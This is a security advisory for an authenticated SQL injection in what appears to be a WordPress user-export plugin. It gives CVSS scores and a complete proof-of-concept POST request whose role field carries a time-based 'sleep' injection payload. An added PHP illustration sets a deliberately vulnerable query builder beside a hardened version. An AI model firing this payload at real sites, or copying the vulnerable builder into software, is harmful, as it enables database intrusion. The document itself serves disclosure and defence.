CVSS3: 7.2 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: HIGH
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVSS2: 6.5 Medium
Access Vector: NETWORK
Access Complexity: LOW
Authentication: SINGLE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P
The plugin did not escape the list of roles to export before using them in a SQL statement in the export functionality, available to admins, leading to an authenticated SQL Injection.
POST /wp-admin/users.php?page=uewm_settings HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------91314853327906118943368521591
Content-Length: 1309
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1
-----------------------------91314853327906118943368521591
Content-Disposition: form-data; name="uewm_roles[]"
editor'%20AND%20(select*from(select(sleep(10)))a)+'
-----------------------------91314853327906118943368521591
Content-Disposition: form-data; name="uewm_use_custom_csv_settings"
1
-----------------------------91314853327906118943368521591
Content-Disposition: form-data; name="uewm_field_separator"
custom
-----------------------------91314853327906118943368521591
Content-Disposition: form-data; name="uewm_custom_field_separator"
=
-----------------------------91314853327906118943368521591
Content-Disposition: form-data; name="uewm_text_qualifier"
double-quote
-----------------------------91314853327906118943368521591
Content-Disposition: form-data; name="uewm_custom_text_qualifier"
"
-----------------------------91314853327906118943368521591
Content-Disposition: form-data; name="save"
Save changes
-----------------------------91314853327906118943368521591
Content-Disposition: form-data; name="_wpnonce"
0c475bfd14
-----------------------------91314853327906118943368521591
Content-Disposition: form-data; name="_wp_http_referer"
/wp-admin/users.php?page=uewm_settings
-----------------------------91314853327906118943368521591--
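The bug described above, shown as an added illustration that is not the plugin's own code: a hypothetical export query builder that concatenates the posted role slugs into SQL, next to a hardened version that allow-lists the slugs against the roles WordPress has registered and binds every value through $wpdb->prepare(). Function names and the query shape are assumptions; the WordPress APIs used ($wpdb->prepare, $wpdb->esc_like, wp_roles(), sanitize_key) are real.

```php
<?php
// Added, hypothetical example: not the plugin's own code.

// VULNERABLE pattern (the defect the advisory describes): the uewm_roles[] values
// are dropped straight into the statement, so a crafted role value such as the one
// in the request above is parsed as SQL instead of as a string.
function uewm_example_export_query_vulnerable( array $roles ) {
    global $wpdb;
    $where = array();
    foreach ( $roles as $role ) {
        $where[] = "um.meta_value LIKE '%\"{$role}\"%'";
    }
    return "SELECT u.ID, u.user_login, u.user_email
            FROM {$wpdb->users} u
            JOIN {$wpdb->usermeta} um ON um.user_id = u.ID
            WHERE um.meta_key = '{$wpdb->prefix}capabilities'
              AND (" . implode( ' OR ', $where ) . ')';
}

// HARDENED: keep only slugs that are registered roles, then let $wpdb->prepare()
// bind each value; esc_like() stops % and _ inside a slug from acting as wildcards.
function uewm_example_export_query_hardened( array $roles ) {
    global $wpdb;
    $known = array_keys( wp_roles()->get_names() );   // e.g. administrator, editor, ...
    $roles = array_values( array_intersect( array_map( 'sanitize_key', $roles ), $known ) );
    if ( empty( $roles ) ) {
        return null; // nothing to export; caller reports an error instead of running SQL
    }
    // one "LIKE %s" per role; capabilities are stored serialized, so match the quoted slug
    $like_clauses = implode( ' OR ', array_fill( 0, count( $roles ), 'um.meta_value LIKE %s' ) );
    $params = array( $wpdb->prefix . 'capabilities' );
    foreach ( $roles as $role ) {
        $params[] = '%' . $wpdb->esc_like( '"' . $role . '"' ) . '%';
    }
    return $wpdb->prepare(
        "SELECT u.ID, u.user_login, u.user_email
         FROM {$wpdb->users} u
         JOIN {$wpdb->usermeta} um ON um.user_id = u.ID
         WHERE um.meta_key = %s AND ({$like_clauses})",
        $params
    );
}
```

With the hardened builder, the crafted value in the PoC is discarded by the allow-list before any SQL is assembled, and a legitimate slug reaches the query only as a bound parameter.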